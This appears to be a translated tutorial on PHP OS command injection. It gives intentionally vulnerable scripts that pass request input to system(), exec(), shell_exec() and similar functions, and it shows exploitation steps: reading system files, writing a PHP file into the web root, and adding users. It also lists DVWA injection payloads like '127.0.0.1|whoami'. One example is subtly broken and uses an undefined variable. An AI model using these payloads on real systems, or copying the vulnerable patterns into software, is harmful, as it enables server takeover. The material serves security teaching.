OS Command Injection
Principle and cause:
In the process of developing applications with scripting languages (such as PHP), the development of scripting languages is fast, concise and convenient, but there are also some problems. For example, slow speed, or inaccessible to the bottom of the system, if we develop applications, especially those at the enterprise level, we need to call some external programs (executables such as system commands or exes). Functions of system commands are used when the application needs to call some external programs. When these functions are called to execute system commands, splicing user input into the command line as a parameter of system commands can create a command execution vulnerability without filtering user input.
1. User input as stitching
2. Not enough filtering
Vulnerability hazard
1. Inherit Web server program permissions (Web user permissions) to execute system commands
2. Inherit Web server permissions, read and write files
3. Bounce Shell (Server Active Connection Attacker)
4. Control the entire Web site
5. Control the whole server
Examples of correlation functions
- system()
system() can execute strings as OS commands with its own output function.
The test code is as follows:
#system.php
<meta charset='gb2312'>
#1
<?php
$str="ipconfig";
system($str);
?>
#2
<?php
if($_GET['cmd']){
$str=$_GET['cmd'];
system($str);
}
?>
#
<?php
if(isset($_GET['cmd'])){
echo "<pre>";
system($_GET['cmd']);
}
else{
echo"?cmd=ipconfig";
}
?>
- exec()
exec() can execute strings as OS commands and requires output of the execution results.
The test code is as follows:
#exec.php
<meta charset="gb2312">
<?php
if(isset($_GET['cmd'])){
echo "<pre>";
print exec($str);
}else{
echo"?cmd=whoami";
}
?>
- shell_exec()
The test code is as follows:
#shell_exec.php
<?php
if(isset($_GET['cmd'])){
print shell_exec($_GET['cmd']);
}else{
echo"?cmd=whoami"; # cmd=systeminfo / net user add
}
?>
- passthru(). In-line Output
The test code is as follows:
#passthru.php
<?php
if(isset($_GET['cmd'])){
passthru($_GET['cmd']);
}else{
echo"?cmd=whoami"; # cmd=systeminfo / net user add
}
?>
- popen(). Executes an OS command, not returning the result of the command, but returning a file pointer.
The test code is as follows:
#popen.php
<?php
if(isset($_GET['cmd'])){
$cmd=$_GET['cmd'].">>1.txt";
popen($cmd,'r');
}else{
echo"?cmd=whoami"; # cmd=systeminfo / net user add
}
?>
View 1.txt file
- Reverse Quotes ` (Mac input, option+1 left keyboard)
Strings within inverted quotes `` are also parsed into OS commands.
The test code is as follows:
#`.php
<?php
if(isset($_GET['cmd'])){
$cmd=$_GET['cmd'];
print `$cmd`;
}else{
echo"?cmd=whoami"; # cmd=systeminfo / net user add
}
?>
Vulnerability Utilization
OS command injection vulnerability, where an attacker directly inherits Web user privileges and executes arbitrary commands on the server, is particularly harmful. The following commands were tested successfully on a windows system.
- View system files
Submit parameters
[?cmd=type c:\windows\system32\drivers\etc\hosts]
View the system hosts file. - Show Current Path
Submit parameter [?cmd=cd] - Write File
Submit parameters
[?cmd=echo"?php phpinfo();?>" > D:\xampp\htdocs\Commandi\shell.php]
There was no error on the page indicating that the file was successfully written. Access the shell.php file.
Defense methods
- Minimize the use of command execution functions, and at disable_ Disabled in functions
- Filter parameters before entering a function or method for command execution
- Parameter values are wrapped in quotes whenever possible and escaped by calling addslashes before splicing
Practice
Security is an issue that needs to be considered in all respects
DVWA Command Injection (Code Audit)
low
127.0.0.1| whoami
127.0.0.1|whoami
127.0.0.1&&whoami
127.0.0.1;whoami
127.0.0.0.1||whoami
medium
127.0.0.1| whoami
127.0.0.1|whoami
127.0.0.0.1||whoami
high
127.0.0.1|whoami